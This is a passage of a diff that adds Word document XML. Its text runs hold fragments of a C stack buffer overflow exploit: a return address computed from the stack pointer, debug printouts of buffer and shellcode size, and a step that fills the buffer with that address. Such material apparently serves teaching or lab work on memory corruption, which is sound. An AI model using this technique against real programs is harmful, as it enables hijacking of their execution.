+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> function. */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>retaddr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>get_sp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>() + 500;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    /* Addresses printed out for orientation, confirmation of process.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">"stack </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>ptr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: 0x%x\n", </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>get_sp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>());</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>retaddr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: 0x%x\n", </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>retptr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>retaddr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: 0x%x\n", </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>get_sp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>() + 502);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>"buffer: 0x%x\n", buffer);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">"shellcode size: %d\n", </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>sizeof</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>(shellcode)); */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">    /* Fill the first 20 words of the buffer with </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>retaddr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
